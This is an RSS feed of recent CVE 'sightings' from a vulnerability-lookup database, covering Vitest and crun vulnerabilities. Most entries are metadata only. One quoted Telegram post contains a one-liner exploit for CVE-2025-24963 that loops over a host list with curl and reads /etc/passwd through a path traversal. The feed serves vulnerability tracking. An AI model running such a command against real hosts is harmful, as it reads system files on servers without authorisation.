<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://db.gcve.eu</link>
    <description>Contains only the most 10 recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sun, 24 May 2026 04:19:52 +0000</lastBuildDate>
    <item>
      <title>7e4ad252-0194-4b2f-9aaf-4a68f2650cfd</title>
      <link>https://db.gcve.eu/sighting/7e4ad252-0194-4b2f-9aaf-4a68f2650cfd/export</link>
      <description>{"uuid": "7e4ad252-0194-4b2f-9aaf-4a68f2650cfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1686", "content": "", "creation_timestamp": "2025-02-12T22:58:21.000000Z"}</description>
      <content:encoded>{"uuid": "7e4ad252-0194-4b2f-9aaf-4a68f2650cfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1686", "content": "", "creation_timestamp": "2025-02-12T22:58:21.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/7e4ad252-0194-4b2f-9aaf-4a68f2650cfd/export</guid>
      <pubDate>Wed, 12 Feb 2025 22:58:21 +0000</pubDate>
    </item>
    <item>
      <title>a7c55491-2c0e-47cd-804f-ecf7a50f7096</title>
      <link>https://db.gcve.eu/sighting/a7c55491-2c0e-47cd-804f-ecf7a50f7096/export</link>
      <description>{"uuid": "a7c55491-2c0e-47cd-804f-ecf7a50f7096", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "published-proof-of-concept", "source": "Telegram/2BvzDhkA_vypO7mGv4Hm3zZ8Jlh39uY-jml8MP6LdNmQUR4", "content": "", "creation_timestamp": "2025-02-19T18:00:38.000000Z"}</description>
      <content:encoded>{"uuid": "a7c55491-2c0e-47cd-804f-ecf7a50f7096", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "published-proof-of-concept", "source": "Telegram/2BvzDhkA_vypO7mGv4Hm3zZ8Jlh39uY-jml8MP6LdNmQUR4", "content": "", "creation_timestamp": "2025-02-19T18:00:38.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/a7c55491-2c0e-47cd-804f-ecf7a50f7096/export</guid>
      <pubDate>Wed, 19 Feb 2025 18:00:38 +0000</pubDate>
    </item>
    <item>
      <title>cc530027-2de1-4459-a8aa-0c86c57a84dc</title>
      <link>https://db.gcve.eu/sighting/cc530027-2de1-4459-a8aa-0c86c57a84dc/export</link>
      <description>{"uuid": "cc530027-2de1-4459-a8aa-0c86c57a84dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3likej7z4zu23", "content": "", "creation_timestamp": "2025-02-19T18:06:44.161397Z"}</description>
      <content:encoded>{"uuid": "cc530027-2de1-4459-a8aa-0c86c57a84dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3likej7z4zu23", "content": "", "creation_timestamp": "2025-02-19T18:06:44.161397Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/cc530027-2de1-4459-a8aa-0c86c57a84dc/export</guid>
      <pubDate>Wed, 19 Feb 2025 18:06:44 +0000</pubDate>
    </item>
    <item>
      <title>181de8ee-61ec-4d75-ad8d-35289f32791e</title>
      <link>https://db.gcve.eu/sighting/181de8ee-61ec-4d75-ad8d-35289f32791e/export</link>
      <description>{"uuid": "181de8ee-61ec-4d75-ad8d-35289f32791e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "seen", "source": "https://t.me/cvedetector/18456", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24965 - Crun Container Runtime File System Escalation Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-24965 \nPublished : Feb. 19, 2025, 5:15 p.m. | 1\u00a0hour, 23\u00a0minutes ago \nDescription : crun is an open source OCI Container Runtime fully written in C. In affected versions A malicious container image could trick the krun handler into escaping the root filesystem, allowing file creation or modification on the host. No special permissions are needed, only the ability for the current user to write to the target file. The problem is fixed in crun 1.20 and all users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"19 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-19T20:24:58.000000Z"}</description>
      <content:encoded>{"uuid": "181de8ee-61ec-4d75-ad8d-35289f32791e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "seen", "source": "https://t.me/cvedetector/18456", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24965 - Crun Container Runtime File System Escalation Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-24965 \nPublished : Feb. 19, 2025, 5:15 p.m. | 1\u00a0hour, 23\u00a0minutes ago \nDescription : crun is an open source OCI Container Runtime fully written in C. In affected versions A malicious container image could trick the krun handler into escaping the root filesystem, allowing file creation or modification on the host. No special permissions are needed, only the ability for the current user to write to the target file. The problem is fixed in crun 1.20 and all users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"19 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-19T20:24:58.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/181de8ee-61ec-4d75-ad8d-35289f32791e/export</guid>
      <pubDate>Wed, 19 Feb 2025 20:24:58 +0000</pubDate>
    </item>
    <item>
      <title>da814310-5953-483a-997d-0d44a43697b5</title>
      <link>https://db.gcve.eu/sighting/da814310-5953-483a-997d-0d44a43697b5/export</link>
      <description>{"uuid": "da814310-5953-483a-997d-0d44a43697b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2496", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8994", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2496\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: N/A\n\ud83d\udccf Modified: 2025-03-26T22:16:00.685Z\n\ud83d\udd17 References:\nNo references available.", "creation_timestamp": "2025-03-26T22:25:30.000000Z"}</description>
      <content:encoded>{"uuid": "da814310-5953-483a-997d-0d44a43697b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2496", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8994", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2496\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: N/A\n\ud83d\udccf Modified: 2025-03-26T22:16:00.685Z\n\ud83d\udd17 References:\nNo references available.", "creation_timestamp": "2025-03-26T22:25:30.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/da814310-5953-483a-997d-0d44a43697b5/export</guid>
      <pubDate>Wed, 26 Mar 2025 22:25:30 +0000</pubDate>
    </item>
    <item>
      <title>6bb43849-4407-43a2-9025-1a6324c2f10a</title>
      <link>https://db.gcve.eu/sighting/6bb43849-4407-43a2-9025-1a6324c2f10a/export</link>
      <description>{"uuid": "6bb43849-4407-43a2-9025-1a6324c2f10a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "published-proof-of-concept", "source": "https://t.me/suboxone_chatroom/7441", "content": "\ud83d\udea8 CVE-2025-24963 - Vitest Browser Mode Local File Read \ud83d\udea8\n\n\ud83d\udca5One Liner Exploit: \ncat file.txt | while read host; do curl -skL \"http://$host/__screenshot-error?file=/etc/passwd\" | grep -E \"root:.*:/bin/\" &amp;amp;&amp;amp; echo \"$host is VULN\"; done", "creation_timestamp": "2025-04-01T12:37:26.000000Z"}</description>
      <content:encoded>{"uuid": "6bb43849-4407-43a2-9025-1a6324c2f10a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "published-proof-of-concept", "source": "https://t.me/suboxone_chatroom/7441", "content": "\ud83d\udea8 CVE-2025-24963 - Vitest Browser Mode Local File Read \ud83d\udea8\n\n\ud83d\udca5One Liner Exploit: \ncat file.txt | while read host; do curl -skL \"http://$host/__screenshot-error?file=/etc/passwd\" | grep -E \"root:.*:/bin/\" &amp;amp;&amp;amp; echo \"$host is VULN\"; done", "creation_timestamp": "2025-04-01T12:37:26.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/6bb43849-4407-43a2-9025-1a6324c2f10a/export</guid>
      <pubDate>Tue, 01 Apr 2025 12:37:26 +0000</pubDate>
    </item>
    <item>
      <title>8b4900a1-3004-4afb-9627-58bb334963e8</title>
      <link>https://db.gcve.eu/sighting/8b4900a1-3004-4afb-9627-58bb334963e8/export</link>
      <description>{"uuid": "8b4900a1-3004-4afb-9627-58bb334963e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "published-proof-of-concept", "source": "Telegram/m_VX8ITBtSBz-wC_458XeKLmc3TfY-HOZ02yPgCyfuW9sk0", "content": "", "creation_timestamp": "2025-04-23T21:00:07.000000Z"}</description>
      <content:encoded>{"uuid": "8b4900a1-3004-4afb-9627-58bb334963e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24963", "type": "published-proof-of-concept", "source": "Telegram/m_VX8ITBtSBz-wC_458XeKLmc3TfY-HOZ02yPgCyfuW9sk0", "content": "", "creation_timestamp": "2025-04-23T21:00:07.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/8b4900a1-3004-4afb-9627-58bb334963e8/export</guid>
      <pubDate>Wed, 23 Apr 2025 21:00:07 +0000</pubDate>
    </item>
    <item>
      <title>3537b937-3c52-4210-a1c9-c0bb2a9113b4</title>
      <link>https://db.gcve.eu/sighting/3537b937-3c52-4210-a1c9-c0bb2a9113b4/export</link>
      <description>{"uuid": "3537b937-3c52-4210-a1c9-c0bb2a9113b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "seen", "source": "https://infosec.exchange/users/certvde/statuses/114816361290443115", "content": "", "creation_timestamp": "2025-07-08T07:10:39.211284Z"}</description>
      <content:encoded>{"uuid": "3537b937-3c52-4210-a1c9-c0bb2a9113b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "seen", "source": "https://infosec.exchange/users/certvde/statuses/114816361290443115", "content": "", "creation_timestamp": "2025-07-08T07:10:39.211284Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/3537b937-3c52-4210-a1c9-c0bb2a9113b4/export</guid>
      <pubDate>Tue, 08 Jul 2025 07:10:39 +0000</pubDate>
    </item>
    <item>
      <title>77280682-3318-427d-b2bd-4f56ab073939</title>
      <link>https://db.gcve.eu/sighting/77280682-3318-427d-b2bd-4f56ab073939/export</link>
      <description>{"uuid": "77280682-3318-427d-b2bd-4f56ab073939", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "seen", "source": "https://bsky.app/profile/certvde.infosec.exchange.ap.brid.gy/post/3ltgqoa3tmza2", "content": "", "creation_timestamp": "2025-07-08T07:10:49.247729Z"}</description>
      <content:encoded>{"uuid": "77280682-3318-427d-b2bd-4f56ab073939", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24965", "type": "seen", "source": "https://bsky.app/profile/certvde.infosec.exchange.ap.brid.gy/post/3ltgqoa3tmza2", "content": "", "creation_timestamp": "2025-07-08T07:10:49.247729Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/77280682-3318-427d-b2bd-4f56ab073939/export</guid>
      <pubDate>Tue, 08 Jul 2025 07:10:49 +0000</pubDate>
    </item>
    <item>
      <title>dadf9031-c615-48ed-af6b-727651a6d07d</title>
      <link>https://db.gcve.eu/sighting/dadf9031-c615-48ed-af6b-727651a6d07d/export</link>
      <description>{"uuid": "dadf9031-c615-48ed-af6b-727651a6d07d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24964", "type": "seen", "source": "https://gist.github.com/david-botelho-mariano/247f704f2e44a7aa42ab36e4b14f5a60", "content": "", "creation_timestamp": "2025-12-14T22:20:38.000000Z"}</description>
      <content:encoded>{"uuid": "dadf9031-c615-48ed-af6b-727651a6d07d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24964", "type": "seen", "source": "https://gist.github.com/david-botelho-mariano/247f704f2e44a7aa42ab36e4b14f5a60", "content": "", "creation_timestamp": "2025-12-14T22:20:38.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/dadf9031-c615-48ed-af6b-727651a6d07d/export</guid>
      <pubDate>Sun, 14 Dec 2025 22:20:38 +0000</pubDate>
    </item>
  </channel>
</rss>
